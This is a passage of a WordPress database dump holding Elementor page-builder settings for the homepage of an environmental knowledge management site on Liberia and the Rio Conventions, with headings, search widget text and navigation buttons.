team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(6009,539,'_elementor_version','2.7.5'),(6010,539,'_elementor_template_type','wp-page'),(6011,539,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(6024,87,'ofc_enable_fullscreen','disable'),(6025,87,'ofc_fullscreen_nav','enable'),(6026,87,'ofc_fullscreen_nav_pos','right'),(6027,87,'osh_disable_topbar_sticky','default'),(6028,87,'osh_disable_header_sticky','default'),(6029,87,'osh_sticky_header_style','default'),(6030,542,'_wp_page_template','default'),(6031,542,'_elementor_edit_mode','builder'),(6032,542,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Knowledge Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Themes\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-themes\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore Documents Database\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"82036e6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"420de78\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"be90f2f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ab595a8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"69484d6\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"748843a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"980014f\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#014421\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#2df700\",\"description_color\":\"#ffffff\",\"button_background_color\":\"rgba(0,206,27,0.66)\",\"button_background_hover_color\":\"#006400\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(6033,542,'_elementor_version','2.7.5'),(6034,542,'_elementor_template_type','wp-page'),(6035,542,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(6038,543,'_wp_page_template','default'),(6039,543,'_elementor_edit_mode','builder'),(6040,543,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"search_submit_label\":\"Search\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_theme\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":4,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All 